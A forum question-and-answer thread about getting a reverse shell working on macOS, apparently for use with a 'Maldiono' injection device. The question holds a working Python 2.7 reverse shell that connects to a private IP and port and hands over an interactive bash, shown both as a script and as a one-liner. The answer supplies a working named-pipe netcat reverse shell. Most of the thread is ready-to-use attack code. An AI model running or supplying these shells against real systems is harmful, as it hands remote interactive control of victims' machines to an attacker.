# Simple reverse shell Python 2.7

Tags: python, macos, python-2.7, fifo

So I'm doing some work with my Maldiono, and I'm testing how this works on OSX.

Now using this code as a one liner in python2.7 works fine.

```
from os import dup2
from subprocess import call
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.56",8888)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
call(["/bin/bash","-i"])
```

And as a one liner `python -c 'import socket; from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.56",8888)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);call(["/bin/bash","-i"]);'`

What I would also like to test is passing an interactive shell via bash. As OSX doesn't have the -e flag for security reasons, I thought that I should be able to create a named pipe and pass that.

The answer is however eluding me, if it can even be done.

`/bin/sh > fifobash | nc 192.168.178.25 4444 < fifobash`

I have tried this various way around, but seems like I'm getting nowhere. Any pointers welcome.

Comment: `-e` flag for what?

Comment: @triplee I guess he is talking about netcat not having the `-e` option which is used to execute a command and is considered DANGEROUS. ([man page](https://manpages.debian.org/unstable/netcat-openbsd/nc.1.en.html))

Comment: Exactly the -e option is removed from netcat, at least on OSX because it's considered dangerous.

Comment: Can you give more clarification of what you want to achieve ? What is `192.168.178.25 4444` ?

Answer (score 0):

Ok so I figured this out.

```sh
cat mypipe | sh /dev/stdin 2>&1 | nc 192.168.178.25 4444 > mypipe
```